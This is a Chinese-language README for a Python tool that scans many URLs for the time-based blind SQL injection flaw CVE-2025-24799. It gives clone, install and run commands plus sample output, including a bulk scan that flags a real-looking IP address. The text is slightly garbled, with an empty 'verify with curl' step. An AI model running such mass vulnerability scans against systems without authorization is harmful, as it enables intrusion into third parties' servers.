一款基于 Python 构建的快速 SQL 注入漏洞扫描器。采用时间盲注检测、多线程及彩色输出,专为测试 CVE-2025-24799 漏洞而设计。
克隆仓库:
git clone https://github.com/MuhammadWaseem29/CVE-2025-24799.git
cd CVE-2025-24799
安装所需依赖包:
pip install requests colorama
使用 Python 3 运行:
python3 exploit.py -u http://example.com
输出:
[VULN] http://example.com/index.php/ajax/ - Delay: 7.40s
python3 exploit.py -f urls.txt -t 15
输出:
Scanning: 100/1000 (10.0%)
[VULN] http://example.com/index.php/ajax/ - Delay: 7.10s
python3 exploit.py -f urls.txt -o results.txt -t 10
输出:
Scanning: 50/500 (10.0%)
[VULN] http://test.com/index.php/ajax/ - Delay: 7.20s
[+] Results saved to results.txt

通过 curl 验证

-u <URL>:要扫描的单个 URL-f <FILE>:包含 URL 的文件(每行一个)-o <FILE>:保存结果到文件-t <NUM>:线程数(默认:10)╔════════════════════════════╗
║ Noob-Wasi SQLi Scanner ║
║ Coded by: Noob-Wasi ║
║ Version: 1.0 ║
╚════════════════════════════╝
Starting SQL injection scan...
Scanning: 200/3494 (5.7%)
[VULN] http://152.67.42.99/index.php/ajax/ - Delay: 7.40s
Scanning: 745/3494 (21.3%)
Scan completed!
-t)作者:Noob-Wasi
GitHub:github.com/MuhammadWaseem29